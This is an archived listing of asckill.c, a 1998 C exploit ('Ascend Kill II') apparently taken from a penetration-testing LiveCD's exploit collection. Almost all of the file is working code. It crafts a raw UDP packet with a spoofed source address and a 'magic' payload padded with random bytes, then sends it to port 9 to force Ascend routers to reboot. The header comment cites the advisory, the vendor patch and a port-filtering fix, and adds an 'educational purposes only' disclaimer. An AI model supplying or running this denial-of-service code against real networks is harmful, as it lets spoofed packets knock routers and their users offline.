home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / ascend / asckill.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  7.6 KB  |  175 lines
  1.  
  2.                     /* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.
  3.                      * see ftp.ascend.com.
  4.                      */
  5.                      
  6.                     /*
  7.                      * Ascend Kill II - C version
  8.                      *
  9.                      * (C) 1998 Rootshell - http://www.rootshell.com/
  10.                      *
  11.                      * Released: 3/16/98
  12.                      *
  13.                      * Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
  14.                      * (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
  15.                      *
  16.                      * Sends a specially constructed UDP packet on the discard port (9)
  17.                      * which cause Ascend routers to reboot.  (Warning! Ascend routers will
  18.                      * process these if they are broadcast packets.)
  19.                      *
  20.                      * Compiled under RedHat 5.0 with glibc.
  21.                      *
  22.                      * NOTE: This program is NOT to be used for malicous purposes.  This is
  23.                      *       intenteded for educational purposes only.  By using this program
  24.                      *       you agree to use this for lawfull purposes ONLY.
  25.                      *
  26.                      * It is worth mentioning that Ascend has known about this bug for quite
  27.                      * some time.
  28.                      *
  29.                      * Fix:
  30.                      *
  31.                      * Filter inbound UDP on port 9.
  32.                      *
  33.                      */
  34.  
  35.                     #include <stdio.h>
  36.                     #include <stdlib.h>
  37.                     #include <string.h>
  38.                     #include <unistd.h>
  39.                     #include <sys/types.h>
  40.                     #include <sys/socket.h>
  41.                     #include <netinet/in.h>
  42.                     #include <netinet/in_systm.h>
  43.                     #include <netinet/ip.h>
  44.                     #include <linux/udp.h>
  45.                     #include <netdb.h>
  46.  
  47.                     #define err(x) { fprintf(stderr, x); exit(1); }
  48.                     #define errs(x, y) { fprintf(stderr, x, y); exit(1); }
  49.  
  50.                     /* This magic packet was taken from the Java Configurator */
  51.                     char ascend_data[] =
  52.                       {
  53.                         0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
  54.                         0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  55.                         0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
  56.                         0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
  57.                         0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
  58.                         0x50, 0x41, 0x53, 0x53};
  59.  
  60.  
  61.                     unsigned short 
  62.                     in_cksum (addr, len)
  63.                          u_short *addr;
  64.                          int len;
  65.                     {
  66.                       register int nleft = len;
  67.                       register u_short *w = addr;
  68.                       register int sum = 0;
  69.                       u_short answer = 0;
  70.  
  71.                       while (nleft > 1)
  72.                         {
  73.                           sum += *w++;
  74.                           nleft -= 2;
  75.                         }
  76.                       if (nleft == 1)
  77.                         {
  78.                           *(u_char *) (&answer) = *(u_char *) w;
  79.                           sum += answer;
  80.                         }
  81.  
  82.                       sum = (sum >> 16) + (sum & 0xffff);
  83.                       sum += (sum >> 16);
  84.                       answer = ~sum;
  85.                       return (answer);
  86.                     }
  87.  
  88.                     int 
  89.                     sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
  90.                          struct sockaddr_in *sin;
  91.                          unsigned short int s, datalen, sport, dport;
  92.                          unsigned long int saddr, daddr;
  93.                          char *data;
  94.                     {
  95.                       struct iphdr ip;
  96.                       struct udphdr udp;
  97.                       static char packet[8192];
  98.                       char crashme[500];
  99.                       int i;
  100.  
  101.                       ip.ihl = 5;
  102.                       ip.version = 4;
  103.                       ip.tos = rand () % 100;;
  104.                       ip.tot_len = htons (28 + datalen);
  105.                       ip.id = htons (31337 + (rand () % 100));
  106.                       ip.frag_off = 0;
  107.                       ip.ttl = 255;
  108.                       ip.protocol = IPPROTO_UDP;
  109.                       ip.check = 0;
  110.                       ip.saddr = saddr;
  111.                       ip.daddr = daddr;
  112.                       ip.check = in_cksum ((char *) &ip, sizeof (ip));
  113.                       udp.source = htons (sport);
  114.                       udp.dest = htons (dport);
  115.                       udp.len = htons (8 + datalen);
  116.                       udp.check = (short) 0;
  117.                       memcpy (packet, (char *) &ip, sizeof (ip));
  118.                       memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  119.                       memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
  120.                       /* Append random garbage to the packet, without this the router
  121.                          will think this is a valid probe packet and reply. */
  122.                       for (i = 0; i < 500; i++)
  123.                         crashme[i] = rand () % 255;
  124.                       memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
  125.                       return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
  126.                                       (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
  127.                     }
  128.  
  129.                     unsigned int 
  130.                     lookup (host)
  131.                          char *host;
  132.                     {
  133.                       unsigned int addr;
  134.                       struct hostent *he;
  135.  
  136.                       addr = inet_addr (host);
  137.                       if (addr == -1)
  138.                         {
  139.                           he = gethostbyname (host);
  140.                           if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
  141.                             return 0;
  142.  
  143.                           bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
  144.                         }
  145.                       return (addr);
  146.                     }
  147.  
  148.                     void
  149.                     main (argc, argv)
  150.                          int argc;
  151.                          char **argv;
  152.                     {
  153.                       unsigned int saddr, daddr;
  154.                       struct sockaddr_in sin;
  155.                       int s, i;
  156.  
  157.                       if (argc != 3)
  158.                         errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);
  159.  
  160.                       if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
  161.                         err ("Unable to open raw socket.\n");
  162.                       if (!(saddr = lookup (argv[1])))
  163.                         err ("Unable to lookup source address.\n");
  164.                       if (!(daddr = lookup (argv[2])))
  165.                         err ("Unable to lookup destination address.\n");
  166.                       sin.sin_family = AF_INET;
  167.                       sin.sin_port = 9;
  168.                       sin.sin_addr.s_addr = daddr;
  169.                       if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
  170.                         {
  171.                           perror ("sendpkt_udp");
  172.                           err ("Error sending the UDP packet.\n");
  173.                         }
  174.                     }
  175.